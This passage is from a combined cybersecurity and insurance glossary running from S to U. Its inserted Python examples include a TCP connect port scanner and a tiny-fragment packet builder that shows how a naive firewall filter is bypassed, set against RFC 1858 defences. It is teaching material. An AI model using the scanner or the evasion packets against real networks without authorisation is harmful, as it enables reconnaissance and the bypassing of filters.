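    print("round trip ok:", stream_decrypt(k, n, ct) == b"meet at noon")
    print("nonce reuse leaks p1 XOR p2:", keystream_reuse_leak(k, n, b"attack at dawn", b"retreat at one"))
```

The practical rule that follows from the last function is that a (key, nonce) pair must never be used for more than one message; a fresh nonce per message is what makes the keystream unique.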
Strong Star Property
In Strong Star Property, a user cannot write data to higher or lower classifications levels than their own.
Structured Securities
Loan-backed securities that have been divided into two or more classes of investors where the payment of interest and/or principal of any class of securities has been allocated in a manner that is not proportional to interest and/or principal received by the issuer from the mortgage pool or other underlying securities.
Structured Settlements
Periodic fixed payments to a claimant for a determinable period, or for life, for the settlement of a claim.
Sub Network
A sub network is a separately identifiable part of a larger network that typically represents a certain limited number of host computers, the hosts in a building or geographic area, or the hosts on an individual local area network.
Subnet Mask
A subnet mask determines the number of bits used for the subnet and host portions of an IP address. It acts as a screen of bits used for routing traffic within a subnet. Once a packet has arrived at a gateway or connection point with its unique network number, it can be routed to its destination within the internal gateways using the subnet number.
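As an added example (not part of this glossary), the Python block below makes the mask arithmetic concrete: it builds an IPv4 mask from a prefix length, ANDs it with an address to separate the network and host portions, derives the broadcast address, and checks whether two addresses share a subnet, which is the decision a host or gateway makes when routing. Function names and the sample addresses are constructed for this illustration; only the standard library `ipaddress` module is used, and only for parsing.

```python
import ipaddress

ALL_ONES = 0xFFFFFFFF


def mask_from_prefix(prefix_len: int) -> int:
    """Build a 32-bit IPv4 subnet mask: prefix_len leading one bits, then zeros."""
    if not 0 <= prefix_len <= 32:
        raise ValueError("IPv4 prefix length must be 0..32")
    return (ALL_ONES << (32 - prefix_len)) & ALL_ONES


def split_ipv4(addr: str, prefix_len: int) -> dict:
    """Separate an address into its network and host portions using the mask."""
    a = int(ipaddress.IPv4Address(addr))
    mask = mask_from_prefix(prefix_len)
    host_mask = ~mask & ALL_ONES          # the bits the mask screens out
    network = a & mask                    # subnet portion
    host = a & host_mask                  # host portion
    broadcast = network | host_mask       # all host bits set
    host_bits = 32 - prefix_len
    return {
        "mask": str(ipaddress.IPv4Address(mask)),
        "network": str(ipaddress.IPv4Address(network)),
        "host_part": host,
        "broadcast": str(ipaddress.IPv4Address(broadcast)),
        # /31 and /32 have no network/broadcast pair, so clamp at zero.
        "usable_hosts": max((1 << host_bits) - 2, 0),
    }


def same_subnet(addr_a: str, addr_b: str, prefix_len: int) -> bool:
    """True when both addresses have the same network portion under the mask."""
    mask = mask_from_prefix(prefix_len)
    return (int(ipaddress.IPv4Address(addr_a)) & mask) == (
        int(ipaddress.IPv4Address(addr_b)) & mask
    )


if __name__ == "__main__":
    # Constructed sample: a /26 carves a /24 into four 64-address subnets.
    print(split_ipv4("192.168.10.77", 26))
    print("same /26:", same_subnet("192.168.10.77", "192.168.10.130", 26))
    print("same /24:", same_subnet("192.168.10.77", "192.168.10.130", 24))
```

The two `same_subnet` calls show why prefix length matters for segmentation: the same pair of hosts is on one subnet at /24 but on different subnets at /26, so traffic between them crosses a gateway in the second case.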
Subrogation
Situation where an insurer, on behalf of the insured, has a legal right to bring a liability suit against a third party who caused losses to the insured. The insurer maintains the right to seek reimbursement for losses incurred by the insurer at the fault of a third party.
Subrogation Clause
Section of insurance policies giving an insurer the right to take legal action against a third party responsible for a loss to an insured for which a claim has been paid.
Subsequent Event
Events or transactions that occur subsequent to the balance sheet date, but before the issuance of the statutory financial statements and before the date the audited financial statements are issued, or available to be issued.
Substandard Risk
(Impaired risk) Risks deemed undesirable due to medical condition or hazardous occupation, requiring the use of a waiver, a special policy form, or a higher premium charge.
Surety Bond
A three-party agreement whereby a guarantor (insurer) assumes an obligation or responsibility to pay a second party (obligee) should the principal debtor (obligor) become in default.
Surplus
Insurance term referring to retained earnings.
Surplus Line
Specialized property or liability coverage available via non-admitted insurers rather than through an admitted insurer licensed to sell that coverage in the state.
Suspicious Files and Behavior
When an endpoint security solution scans files, it labels them as clean or malicious. If a file has questionable characteristics or behavior, it is labeled as suspicious.
Swap
An agreement to exchange or net payments as the buyer of an Option, Cap or Floor and to make payments as the seller of a different Option, Cap or Floor.
Switch
A switch is a device that connects multiple devices together on a network by using packet switching to receive, process, and forward data to the destination devices.
Switched Network
A switched network (or fully switched network) is a computer network that uses only network switches rather than network hubs on Ethernet local area networks. The switches allow for a dedicated connection to each workstation. A switch allows many conversations to occur simultaneously.
Symbolic Links
Symbolic links are sometimes also known as symlinks. Symbolic links are essentially advanced shortcuts that point to another file.
Symmetric Cryptography
Symmetric Cryptography is a branch of cryptography involving algorithms that use the same (symmetric) key for two different steps of the algorithm, such as encryption and decryption. Symmetric cryptography is also called secret-key cryptography because the entities that share the key must keep it secret.
Symmetric Key
A Symmetric key is used in a symmetric cryptographic algorithm.
SYN Flood
A SYN flood is a type of denial-of-service attack in which an attacker sends a succession of SYN requests to a target’s system to consume enough server resources to make the system unresponsive to legitimate traffic.
Synchronization
Synchronization is the signal made up of a distinctive pattern of bits that network hardware looks for to signal the start of a frame. Synchronization also refers to one of two distinct but related concepts: synchronization of processes, and synchronization of data.
Syslog
Syslog is a widely used standard for message logging on Unix systems. It permits separation of the software that generates messages, the system that stores them, and the software that reports and analyzes them.
System-Specific Policy
A system-specific policy is a policy written for a specific system or device and may change with changes in the system or device, its functionality, or its vulnerabilities.
T
Tamper
Tamper is defined as deliberately trying to change or alter a system’s logic, data, or control information to cause the system to perform unauthorized functions or services.
TCP
Transmission Control Protocol (TCP) is the connection-oriented transport protocol of the Internet protocol suite. It establishes a connection with a three-way handshake (SYN, SYN/ACK, ACK) and then delivers a reliable, ordered byte stream, acknowledging received data and retransmitting lost segments.
TCP Fingerprinting
TCP/IP stack fingerprinting is the collection of configuration attributes from a remote device during layer 3 and 4 network communications, either passively, by observing normal traffic, or actively, by sending specially crafted probes. The combination of parameters (initial TTL, window size, TCP options and their order, responses to unusual flag combinations) may be used to infer the remote machine's operating system (OS) or incorporated into a device fingerprint.
TCP Full Open Scan
A TCP full open scan (connect scan) checks each port by performing a full three-way handshake and then closing the connection: a completed handshake means the port is open, a RST means it is closed, and no reply means it is filtered. Because the connection is fully established, the target application sees it and may log it, which makes this the noisiest scan type; it is also the only one that needs no raw-socket privileges.
TCP Half Open Scan
A TCP half open scan determines whether a port is open by performing only the first half of a three-way handshake; it is also referred to as SYN scanning. The scanner sends a SYN (synchronization) packet to each port of interest as if initiating a connection: a SYN/ACK reply means the port is open, a RST means it is closed, and no reply (or an ICMP unreachable) means it is filtered. Instead of completing the handshake with an ACK, the scanner answers a SYN/ACK with a RST, so the connection is never established and the target application never sees it, although network-level sensors still can. Crafting SYN packets this way requires raw socket access.
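The full open scan described in the two entries above, as an added example (not code from the page or from any scanner): each port is classified by what happens to a complete handshake. The half open variant is not reproduced because sending a bare SYN needs raw sockets; the only difference is that the scanner never sends the final ACK. The loopback listener and the bound-but-not-listening socket are constructed so the example runs offline and produces one open and one closed port.

```python
import socket
from concurrent.futures import ThreadPoolExecutor
from typing import Dict, Iterable, List, Tuple


def probe_port(host: str, port: int, timeout: float = 0.5) -> str:
    """Classify one port with a full-open (connect) scan.

    create_connection() completes the whole handshake (SYN, SYN/ACK, ACK), so
    "open" means the peer really accepted the connection and will see it in its
    logs; a RST from the target surfaces as ConnectionRefusedError ("closed");
    no answer within the timeout means something in the path dropped the SYN
    ("filtered").
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except ConnectionRefusedError:
        return "closed"
    except (socket.timeout, OSError):
        return "filtered"


def tcp_connect_scan(host: str, ports: Iterable[int], workers: int = 32) -> Dict[int, str]:
    """Scan the given ports concurrently; returns {port: "open"|"closed"|"filtered"}."""
    port_list: List[int] = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(zip(port_list, pool.map(lambda p: probe_port(host, p), port_list)))


def demo_scan() -> Tuple[Dict[int, str], int, int]:
    """Stand up a listening socket and a bound-but-not-listening socket on loopback,
    scan both, and return (results, open_port, closed_port)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))          # port 0: let the kernel pick a free port
    listener.listen(5)                        # the kernel completes handshakes into the backlog,
    open_port = listener.getsockname()[1]     # so no accept() loop is needed for "open"

    silent = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    silent.bind(("127.0.0.1", 0))             # bound but never listen()ed: every SYN gets a RST
    closed_port = silent.getsockname()[1]

    try:
        results = tcp_connect_scan("127.0.0.1", [open_port, closed_port])
    finally:
        listener.close()
        silent.close()
    return results, open_port, closed_port


if __name__ == "__main__":
    results, open_port, closed_port = demo_scan()
    for port in (open_port, closed_port):
        print("127.0.0.1:%d %s" % (port, results[port]))
```

Against a real target the "filtered" bucket is where most of the ambiguity lives: a timeout cannot distinguish a stateful firewall from a host that is simply slow, so scanners retry those ports before reporting.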
TCP/IP
TCP/IP stands for Transmission Control Protocol/Internet Protocol. It is a basic communication language or protocol of the Internet and can be used as a communications protocol in a private network as well (either an intranet or an extranet).
TCP Wrapper
A TCP Wrapper is a software package used to restrict access to certain network services based on the connection source. In other words, it is a host-based networking ACL system used to filter network access to Internet Protocol servers on Unix-like operating systems such as GNU/Linux or BSD. Rules are read from /etc/hosts.allow and /etc/hosts.deny, and only services linked against libwrap or started through tcpd honor them, so it complements rather than replaces a host firewall.
TCPDump
TCPDump is a free, open-source command-line protocol analyzer for Unix-like systems that captures and decodes network traffic on an interface. It allows the user to display TCP/IP and other packets being transmitted or received over a network, selecting traffic of interest with a filter expression; capturing requires root privileges or the capture capability. Tcpdump works on most Unix-like operating systems: Linux, Solaris, BSD, OS X, HP-UX, Android, and AIX, among others. It was originally written in 1987 by Van Jacobson, Craig Leres and Steven McCanne, who were working in the Lawrence Berkeley Laboratory Network Research Group.
TELNET
Telnet is a TCP-based application-layer Internet Standard protocol for accessing remote computers, historically an essential part of TCP/IP. Through Telnet, an administrator or another user can log in to and operate another computer remotely. Telnet sends everything, including usernames and passwords, in cleartext, so it has been replaced by SSH for remote administration; a Telnet service found on a network today is a finding in its own right.
Tenants
A person(s) who occupies land or property rented from a landlord.
Term
Period of time for which policy is in effect.
Term Insurance
Life insurance payable only if death of insured occurs within a specified time, such as 5 or 10 years, or before a specified age.
Third Party
A person other than the insured or insurer who has incurred losses or is entitled to receive payment due to the acts or omissions of the insured.
Threat
A threat, in the context of cybersecurity, is any circumstance, event, or actor with the potential to harm a computer system or the data it processes, whether by exploiting a vulnerability or by other means such as theft or loss of power.
Threat Agent
An individual, group, organization, or government that conducts or intends to conduct malicious activities.
Threat Assessment
Threat assessment is the practice of determining the credibility and seriousness of a potential threat, as well as the probability that the threat will become a reality.
Threat Model
A threat model is the output of threat modeling, a structured process used to improve the security of a system or network by identifying its assets and key security objectives, the ways an attacker could reach them (entry points and trust boundaries) and the relevant vulnerabilities, and then defining countermeasures to prevent or mitigate the identified threats.
Threat Vector
A threat vector is the path or means by which a threat reaches its target, such as a phishing email, a vulnerable exposed service, or a malicious removable device.
Time to Live
Time to Live (TTL), called the hop limit in IPv6, is a mechanism that limits the lifespan of data in a computer or network. TTL is generally implemented as a counter or time stamp attached to or embedded in the data. In an IP packet the TTL field is decremented by every router that forwards it; when it reaches zero the router discards the packet and sends an ICMP Time Exceeded message back to the source, which keeps misrouted packets from circulating forever and is the mechanism traceroute relies on. The initial TTL a host chooses (commonly 64, 128, or 255) is also a fingerprinting clue to its operating system.
Tiny Fragment Attack
A tiny fragment attack abuses IP fragmentation, the process of breaking up a single Internet Protocol (IP) datagram into multiple packets of smaller size. Every network link has a characteristic maximum size of message it can carry, called the maximum transmission unit (MTU), so datagrams larger than the MTU are fragmented. If an attacker makes the first fragment small enough to push some of a TCP segment's header fields (such as the flags byte) into the second fragment, filter rules that test those fields cannot match the first fragment, and the second fragment carries no port fields to match at all. If the filtering implementation does not enforce a minimum first-fragment size, a disallowed packet can therefore be passed because it never hit a match in the filter, and the destination host reassembles it into the forbidden packet. STD 5, RFC 791 states that "Every Internet module must be able to forward a datagram of 68 octets without further fragmentation," because an Internet header may be up to 60 octets and the minimum fragment is 8 octets; an 8-octet first fragment holds only the TCP ports and sequence number. RFC 1858 describes the countermeasures: drop TCP first fragments that carry fewer than 16 octets of transport header, and drop TCP fragments with a fragment offset of 1, which can only arise from the overlapping-fragment variant of the attack. IP fragmentation exploits in general use the fragmentation mechanism within IP as an attack vector.
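The bypass and the RFC 1858 checks above, as an added example (not code from the page or from any firewall): a packet builder that fragments a TCP SYN, a stateless filter that only tests what is present in the fragment it holds, and the same filter with the two RFC 1858 checks added. The filter rule (block new connections to port 23) and the addresses are assumptions; IP checksums are left at zero because nothing here verifies them.

```python
import struct
from typing import Callable, Dict, List

IPPROTO_TCP = 6
TCP_SYN, TCP_ACK = 0x02, 0x10
MIN_FIRST_FRAGMENT = 16     # RFC 1858 "tmin": enough TCP header to include the flags byte (offset 13)


def _ip4(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))


def ipv4_packet(payload: bytes, src: str, dst: str, ident: int, mf: bool, frag_offset: int) -> bytes:
    """Prepend a 20-byte IPv4 header (protocol TCP, checksum left zero: not checked here)."""
    flags_frag = (0x2000 if mf else 0) | (frag_offset & 0x1FFF)   # MF bit + 13-bit offset in 8-byte units
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident,
                      flags_frag, 64, IPPROTO_TCP, 0, _ip4(src), _ip4(dst))
    return hdr + payload


def tcp_header(sport: int, dport: int, flags: int, seq: int = 1) -> bytes:
    """Minimal 20-byte TCP header with no options; byte 13 carries the flags."""
    return struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, flags, 65535, 0, 0)


def fragment(segment: bytes, first_len: int, src: str, dst: str, ident: int = 0x1234) -> List[bytes]:
    """Split one TCP segment into two IP fragments; the first carries first_len bytes (a multiple of 8)."""
    if first_len % 8 or first_len >= len(segment):
        raise ValueError("first fragment must be a multiple of 8 bytes and shorter than the segment")
    return [ipv4_packet(segment[:first_len], src, dst, ident, True, 0),
            ipv4_packet(segment[first_len:], src, dst, ident, False, first_len // 8)]


def parse_ip(pkt: bytes) -> Dict[str, object]:
    ver_ihl, _, _, _, flags_frag, _, proto, _, _, _ = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    return {"proto": proto, "mf": bool(flags_frag & 0x2000),
            "offset": flags_frag & 0x1FFF, "payload": pkt[ihl:]}


def naive_filter(pkt: bytes, blocked_port: int) -> str:
    """Rule: drop new inbound TCP connections (ACK clear) to blocked_port.
    Stateless, and able to test only what is present in the fragment in hand."""
    ip = parse_ip(pkt)
    if ip["proto"] != IPPROTO_TCP or ip["offset"] != 0:
        return "PASS"                       # non-first fragments carry no port or flag fields to match
    tcp = ip["payload"]
    if len(tcp) < 14:
        return "PASS"                       # flags byte absent: the rule cannot match, so the packet slips through
    dport = struct.unpack("!H", tcp[2:4])[0]
    if dport == blocked_port and not (tcp[13] & TCP_ACK):
        return "DROP"
    return "PASS"


def rfc1858_filter(pkt: bytes, blocked_port: int) -> str:
    """Same rule, with the two RFC 1858 checks applied before the rule is consulted."""
    ip = parse_ip(pkt)
    if ip["proto"] == IPPROTO_TCP:
        if ip["offset"] == 0 and len(ip["payload"]) < MIN_FIRST_FRAGMENT:
            return "DROP"                   # tiny first fragment: header fields pushed into fragment 2
        if ip["offset"] == 1:
            return "DROP"                   # for TCP, offset 1 can only be an overlapping-fragment attack
    return naive_filter(pkt, blocked_port)


def verdicts(filt: Callable[[bytes, int], str], packets: List[bytes], blocked_port: int = 23) -> List[str]:
    return [filt(p, blocked_port) for p in packets]


# Constructed traffic: a SYN to telnet (port 23) sent whole, the same SYN as an 8-byte tiny
# first fragment plus remainder, and an ACK-only segment belonging to an established session.
SRC, DST = "198.51.100.7", "192.0.2.10"
SYN_TO_TELNET = tcp_header(40000, 23, TCP_SYN)
WHOLE = [ipv4_packet(SYN_TO_TELNET, SRC, DST, 0x1234, False, 0)]
TINY = fragment(SYN_TO_TELNET, 8, SRC, DST)
ESTABLISHED = [ipv4_packet(tcp_header(40000, 23, TCP_ACK), SRC, DST, 0x1235, False, 0)]

if __name__ == "__main__":
    for name, filt in (("naive", naive_filter), ("rfc1858", rfc1858_filter)):
        print(name, verdicts(filt, WHOLE), verdicts(filt, TINY), verdicts(filt, ESTABLISHED))
```

With the naive filter the whole SYN is dropped but both tiny fragments pass and reassemble at the host into exactly the packet the rule was meant to stop; the hardened filter drops both fragments while still passing the legitimate established-session segment.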
Title Insurance
Coverage that guarantees the validity of a title to real and personal property. Buyers of real and personal property and mortgage lenders rely upon the coverage to protect them against losses from undiscovered defects in existence when the policy is issued.
TLS
Transport Layer Security (TLS) is a protocol that provides confidentiality, integrity, and authentication between communicating applications on the Internet. When a server and client communicate, TLS ensures that no third party can read or tamper with any message without detection, and the client verifies the server's identity through its certificate. TLS is the successor to the Secure Sockets Layer (SSL); SSL 3.0 and TLS 1.0 and 1.1 are deprecated and should be disabled, leaving TLS 1.2 and 1.3 as the versions to deploy.
Token-Based Access Control
Token-based access control is an authentication method that adds a possession factor to the password. Each user has a smart card or token that either displays a constantly changing one-time password or has buttons that compute a new code from a challenge the system presents. Without the card or token a user cannot authenticate to the system. This two-factor authentication provides additional security by requiring an attacker to both learn the user's password and steal the token that is used to access the system. It does not by itself stop real-time phishing, in which the victim is tricked into typing the current code into an attacker's page, and the server must compare codes in constant time and accept each one only once.
Token-Based Devices
A token-based device or security token is known by several names, such as hardware token, authentication token, USB token, cryptographic token, software token, virtual token, or key fob. A security token may be a physical device that an authorized user is given to access a system or network. Security tokens are used to prove one's identity electronically and are used in addition to or in place of a password to prove that the user is who they claim to be. The token acts like an electronic key to access something.
Token Ring
A token ring network is a local area network in which all computers are connected in a ring or star topology and a token-passing scheme is used to prevent collisions between two computers that want to send at the same time. A special three-byte frame called a "token" travels around a logical ring of workstations or servers, and only the station holding the token may transmit.
Topology
Topology is the geometric arrangement of a computer system. Common topologies include a bus, star, and ring. Two networks have the same topology if the connection configuration is the same, although the networks may differ in physical interconnections, distances between nodes, transmission rates, and/or signal types.
Total Liabilities
Total money owed or expected to be owed by the insurance company.
Total Revenue
Premiums, revenue, investment income, and income from other sources.
Traceroute
Traceroute is a tool that maps the route a packet takes from the local machine to a remote destination. It sends probes with increasing TTL values (1, 2, 3, and so on); each router that decrements a probe's TTL to zero discards it and returns an ICMP Time Exceeded message, revealing that hop's address, until the destination itself answers. The round-trip time to each successive hop is recorded for the path. Traceroute establishes no connection, and hops that do not send ICMP replies, or sit behind filtering, show up as timeouts.
Transmission Control Protocol
Transmission Control Protocol (TCP) is the connection-oriented transport protocol of the Internet protocol suite. It establishes a connection with a three-way handshake (SYN, SYN/ACK, ACK) and then delivers a reliable, ordered byte stream, acknowledging received data and retransmitting lost segments.
Transport Layer Security
Transport Layer Security (TLS) is a protocol that provides confidentiality, integrity, and authentication between communicating applications on the Internet. When a server and client communicate, TLS ensures that no third party can read or tamper with any message without detection, and the client verifies the server's identity through its certificate. TLS is the successor to the Secure Sockets Layer (SSL); SSL 3.0 and TLS 1.0 and 1.1 are deprecated and should be disabled, leaving TLS 1.2 and 1.3 as the versions to deploy.
Travel Coverage
Covers financial loss due to trip cancellation/interruption; lost or damaged baggage; trip or baggage delays; missed connections and/or changes in itinerary; and casualty losses due to rental vehicle damage.
Treaty
A reinsurance agreement between the ceding company and reinsurer.
Triple DES
Triple DES (3DES) is the common name for the Triple Data Encryption Algorithm (TDEA or Triple DEA) symmetric-key block cipher, which applies the Data Encryption Standard (DES) cipher algorithm three times to each 64-bit data block (encrypt, decrypt, encrypt), using either two or three different keys, for a nominal key length of 112 or 168 bits. Its effective strength is lower (about 112 bits for three-key and about 80 bits for two-key 3DES because of meet-in-the-middle attacks), and its 64-bit block size makes it vulnerable to birthday attacks when large volumes of data are encrypted under one key. NIST has deprecated 3DES and disallowed it for new encryption after 2023; AES should be used instead.
Triple-Wrapped
Triple-wrapped describes data that has been signed with a digital signature, then encrypted, and then signed again. The inner signature binds the originator to the plaintext, while the outer signature lets intermediaries verify the message's origin without decrypting it; the term comes from the S/MIME Enhanced Security Services (RFC 2634).
Trojan
Trojan is a type of malware that is often disguised as legitimate software.
Trojan Horse
Trojans (Trojan horses) are malicious programs that pretend to be legitimate software but carry out hidden, harmful functions, such as opening a backdoor or stealing credentials. Unlike viruses and worms, Trojans do not replicate themselves; they rely on the user being tricked into installing or running them.
Trunking
Trunking is a method for a system to provide network access to many clients by sharing a set of lines or frequencies instead of providing them individually. This is analogous to the structure of a tree with one trunk and many branches.
Trust
Trust determines which permissions and what actions other systems or users can perform on remote machines.
Trusted Certificate
A Trusted Certificate is any digital certificate that a certificate user accepts as being valid without testing the certificate to validate it as the final certificate on a certification path; especially a certificate that is used as a trust anchor certificate.
Trusted Ports
Trusted ports, more commonly called privileged or well-known ports, are TCP and UDP ports below 1024; on Unix-like systems only the root user (or, on Linux, a process holding the CAP_NET_BIND_SERVICE capability) may bind to them. The idea is that a service listening on such a port was started by an administrator. This says nothing about a client connecting from a low source port, which the administrator of any machine can arrange, so a low source port must not be used as an authentication signal.
Tunnel
A Tunnel is a communication channel created in a computer network by encapsulating a communication protocol’s data packets in a second protocol that normally would be carried above, or at the same layer as, the first one. Most often, a tunnel is a logical point-to-point link created by encapsulating the layer 2 protocol in a transport protocol (such as TCP), in a network or inter-network layer protocol (such as IP), or in another link layer protocol. Tunneling can move data between computers that use a protocol not supported by the network connecting them.
Two-factor authentication (or multi-factor authentication)
This term describes the use of two or more different kinds of evidence to log in to a system: something the user knows (a password), something the user has (a phone, hardware token, or smart card), or something the user is (a biometric). Two-factor authentication prevents attackers from gaining access with just one exploited password, because the second factor is still missing. For example, you may still need to enter a code from an authenticator app after entering your password to log in. Codes typed by the user can still be phished in real time; phishing-resistant factors such as FIDO2 security keys bind the login to the genuine site.
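The "constantly changing password" of the Token-Based Access Control entry and the authenticator-app code in the Two-factor authentication entry are the same mechanism: HOTP (RFC 4226) driven by the clock (TOTP, RFC 6238). As an added example (not code from the page or from any authenticator), here is both the code generation and a server-side verifier that tolerates one step of clock skew, compares in constant time, and refuses a replayed code. The only key material is the public test key from the two RFCs' appendices.

```python
import hashlib
import hmac
import struct
import time
from typing import Optional

# Shared test key from the RFC 4226 and RFC 6238 test vectors (ASCII "12345678901234567890").
RFC_TEST_SECRET = b"12345678901234567890"


def hotp(secret: bytes, counter: int, digits: int = 6, algo=hashlib.sha1) -> str:
    """RFC 4226 HOTP: HMAC over the 8-byte big-endian counter, dynamic truncation, mod 10^digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F                        # low nibble of the last byte picks 4 bytes
    code = ((mac[offset] & 0x7F) << 24 | mac[offset + 1] << 16
            | mac[offset + 2] << 8 | mac[offset + 3])
    return str(code % 10 ** digits).zfill(digits)  # keep leading zeros


def totp(secret: bytes, at: int, step: int = 30, digits: int = 6, algo=hashlib.sha1) -> str:
    """RFC 6238 TOTP: HOTP with the counter derived from Unix time (T0 = 0)."""
    return hotp(secret, at // step, digits, algo)


class TotpVerifier:
    """Server-side check that accepts the current step and +/- `window` neighbours
    (clock skew between token and server) but never the same step twice."""

    def __init__(self, secret: bytes, window: int = 1, step: int = 30, digits: int = 6):
        self.secret, self.window, self.step, self.digits = secret, window, step, digits
        self.last_accepted_counter = -1     # in a real deployment, persisted per user

    def verify(self, submitted: str, at: Optional[int] = None) -> bool:
        if at is None:
            at = int(time.time())
        counter = at // self.step
        for skew in range(-self.window, self.window + 1):
            c = counter + skew
            if c <= self.last_accepted_counter:
                continue                    # replay: each time step may be consumed once
            expected = hotp(self.secret, c, self.digits)
            if hmac.compare_digest(expected, submitted):   # constant-time comparison
                self.last_accepted_counter = c
                return True
        return False


if __name__ == "__main__":
    now = int(time.time())
    print("current code:", totp(RFC_TEST_SECRET, now))
    print("accepted:", TotpVerifier(RFC_TEST_SECRET).verify(totp(RFC_TEST_SECRET, now), now))
```

Two things the verifier gets right that ad-hoc implementations often miss: a code is never valid more than once (an attacker who shoulder-surfs a code has under a minute, and loses the race if the user has already logged in), and `hmac.compare_digest` keeps the response time independent of how many leading digits were correct.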
U
UDP Scan
A UDP scan determines which UDP ports are open. UDP is a connectionless protocol, so there is no equivalent to a TCP SYN packet; the scanner instead sends a UDP datagram (empty, or a protocol-specific payload for well-known services such as DNS or SNMP) to each port. If the port is closed, the system responds with an ICMP port unreachable message. An application-layer reply means the port is open, but an open port whose service ignores the probe sends nothing, and a firewall dropping the probe also produces silence, so ports with no response can only be reported as "open or filtered". Many systems rate-limit ICMP unreachable messages, which makes UDP scans slow.
ULAE
Loss adjustment expenses that cannot be specifically tied to a claim.
Unallocated Loss Adjustment Expense
Loss adjustment expenses that cannot be specifically tied to a claim.
Unauthorized Reinsurance
Reinsurance placed with a company not authorized in the reporting company's state of domicile.
Underlying Interest
The asset(s), liability(ies) or other interest(s) underlying a derivative instrument, including, but not limited to, any one or more securities, currencies, rates indices, commodities, derivative instruments, or other financial market instruments.
Underwriter
A person who identifies, examines, and classifies the degree of risk represented by a proposed insured to determine if coverage should be provided and, if so, at what rate.
UDP
User Datagram Protocol (UDP) is a connectionless transport protocol in the Internet protocol suite and the main alternative to Transmission Control Protocol (TCP). It sends individual datagrams with no handshake, acknowledgment, retransmission, or ordering, so it is used for low-latency, loss-tolerant traffic such as DNS, VoIP, streaming, and NTP. Because there is no handshake, source addresses are trivially spoofed, which is what makes UDP services usable for reflection and amplification attacks.
Underwriting
The process by which an insurance company examines risk and determines whether the insurer will accept the risk or not, classifies those accepted and determines the appropriate rate for coverage provided.
Underwriting Risk
Section of the risk-based capital formula calculating requirements for reserves and premiums.
Unearned Premium
Amount of premium for which payment has been made by the policyholder but coverage has not yet been provided.
Unearned Premium Reserve
All premiums (fees) received for coverage extending beyond the statement date appear as a liability on the balance sheet.
Unicast
Unicast is any communication between a single sender and a single receiver over a network. The term contrasts with multicast (communication between a single sender and the group of receivers that have joined a multicast group), broadcast (delivery to every host on a network segment), and anycast (communication between a sender and the nearest one of a group of receivers that share an address).
Unified Threat Management
UTM brings together multiple security functions into a single network appliance.
Uniform Resource Identifier
A Uniform Resource Identifier (URI) is a string of characters used to identify a resource's name. Such identification enables interaction with representations of the resource over a network (such as the World Wide Web) using specific protocols. In other words, URI is the generic term for all types of names and addresses that refer to objects on the World Wide Web.
Uniform Resource Locator
A Uniform Resource Locator (URL) is the global address of documents and other resources on the World Wide Web. The first part of the address (the scheme) indicates what protocol to use, and the second part (the authority) specifies the IP address or the domain name where the resource is located, optionally with a port and a user name; a path, query string, and fragment may follow. A URL is a specific type of Uniform Resource Identifier (URI), although many people use the two terms interchangeably. A URL implies the means to access an indicated resource, which is not true of every URI. URLs occur most commonly to reference web pages (http, https) but are also used for file transfer (ftp), email (mailto), database access (JDBC), and many other applications.
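The "first part" and "second part" of a URL above are only safe to act on after real parsing, because the authority can also carry a user name and a port. As an added example (not code from the page), here is the naive split many hand-written checks use next to a parsed allowlist check; the allowed host names and the sample URLs are constructed for the example.

```python
from typing import Dict, Iterable, Optional
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"good.example", "api.good.example"}   # constructed allowlist


def naive_host(url: str) -> str:
    """The 'second part of the address' taken literally: everything between // and the next /.
    This keeps any user@ prefix and :port attached, so a substring test on it is easily fooled."""
    return url.split("//", 1)[1].split("/", 1)[0]


def url_parts(url: str) -> Dict[str, Optional[object]]:
    """Break a URL into the components a policy decision should look at individually."""
    p = urlsplit(url)
    return {"scheme": p.scheme, "userinfo": p.username, "host": p.hostname, "port": p.port,
            "path": p.path, "query": p.query, "fragment": p.fragment}


def allowed_target(url: str, hosts: Iterable[str] = ALLOWED_HOSTS,
                   schemes: Iterable[str] = ("http", "https")) -> bool:
    """Allowlist check for an outbound fetch or redirect: exact match on the parsed host name."""
    p = urlsplit(url)
    if p.scheme not in set(schemes):          # urlsplit lower-cases the scheme
        return False                          # javascript:, file:, data: and friends are never fetched
    if p.username is not None or p.password is not None:
        return False                          # user@ in a web URL is almost always an attempt at confusion
    try:
        p.port                                # raises ValueError for a malformed port
    except ValueError:
        return False
    return p.hostname is not None and p.hostname in set(hosts)   # hostname is lower-cased


if __name__ == "__main__":
    tricky = "https://good.example@evil.example:8443/login?next=1#top"
    print("naive:", naive_host(tricky))
    print("parsed:", url_parts(tricky))
    print("allowed:", allowed_target(tricky))
```

The exact-match rule matters as much as the parser: a check written as `host.endswith("good.example")` would also admit `notgood.example`, and a substring check admits the user-name trick shown here.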
Unix
Unix is a multi-user, multi-tasking operating system developed at Bell Labs in the early 1970s by Ken Thompson, Dennis Ritchie, and others. Unix was designed to be a small, flexible system and was initially used mainly by programmers; its design, with a file permission model, a hierarchical file system, and small composable tools, underlies Linux, the BSDs, and macOS.
Unpaid Losses
Claims that are in the course of settlement. The term may also include claims that have been incurred but not reported.
Unprotected Share
A share is a mechanism that allows a user to connect to file systems and printers on other systems over the network (for example SMB shares or NFS exports). An unprotected share is one that allows anyone to connect to it, without authentication or with a well-known password; such shares are a common source of data exposure and a path by which malware spreads between hosts.
URI
A Uniform Resource Identifier (URI) is a string of characters used to identify a resource's name. Such identification enables interaction with representations of the resource over a network (such as the World Wide Web) using specific protocols. In other words, URI is the generic term for all types of names and addresses that refer to objects on the World Wide Web.
URL
